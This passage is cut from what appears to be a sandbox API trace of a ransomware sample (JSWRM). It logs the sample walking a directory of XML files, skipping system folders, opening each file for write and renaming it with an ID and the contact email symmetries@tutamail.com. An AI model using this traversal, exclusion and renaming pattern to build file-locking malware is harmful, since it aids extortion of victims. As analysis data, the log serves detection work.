lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0068.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.091] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9969134492412272) returned 0 [0068.091] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.091] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.091] CloseHandle (hObject=0xffffffff) returned 1 [0068.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0068.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0068.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0068.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.092] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0068.092] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2=".") returned 1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="..") returned 1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="...") returned 1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="windows") returned -1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="recovery") returned -1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="perflogs") returned -1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="documents and settings") returned -1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="system volume information") returned -1 [0068.092] lstrcmpiW (lpString1="base_jpn.xml", lpString2="msocache") returned -1 [0068.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_jpn.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_jpn.xml", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_jpn.xml", lpUsedDefaultChar=0x0) returned 12 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_jpn.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_jpn.xml", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_jpn.xml", lpUsedDefaultChar=0x0) returned 12 [0068.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0068.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0068.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.093] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9953329012762624) returned 0 [0068.093] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.093] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.093] CloseHandle (hObject=0xffffffff) returned 1 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0068.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0068.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0068.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0068.093] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2=".") returned 1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="..") returned 1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="...") returned 1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="windows") returned -1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="recovery") returned -1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="perflogs") returned -1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="documents and settings") returned -1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="system volume information") returned -1 [0068.094] lstrcmpiW (lpString1="base_kor.xml", lpString2="msocache") returned -1 [0068.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_kor.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_kor.xml", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_kor.xml", lpUsedDefaultChar=0x0) returned 12 [0068.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_kor.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_kor.xml", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_kor.xml", lpUsedDefaultChar=0x0) returned 12 [0068.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0068.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0068.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0068.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.094] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9968344218426312) returned 0 [0068.094] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.094] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.094] CloseHandle (hObject=0xffffffff) returned 1 [0068.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0068.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0068.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.095] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0068.095] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2=".") returned 1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="..") returned 1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="...") returned 1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="windows") returned -1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="recovery") returned -1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="perflogs") returned -1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="documents and settings") returned -1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="system volume information") returned -1 [0068.095] lstrcmpiW (lpString1="base_rtl.xml", lpString2="msocache") returned -1 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_rtl.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_rtl.xml", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_rtl.xml", lpUsedDefaultChar=0x0) returned 12 [0068.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_rtl.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_rtl.xml", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_rtl.xml", lpUsedDefaultChar=0x0) returned 12 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0068.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0068.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.096] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9952538738778688) returned 0 [0068.096] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.096] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.096] CloseHandle (hObject=0xffffffff) returned 1 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0068.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0068.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0068.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0068.096] HeapFree (in: 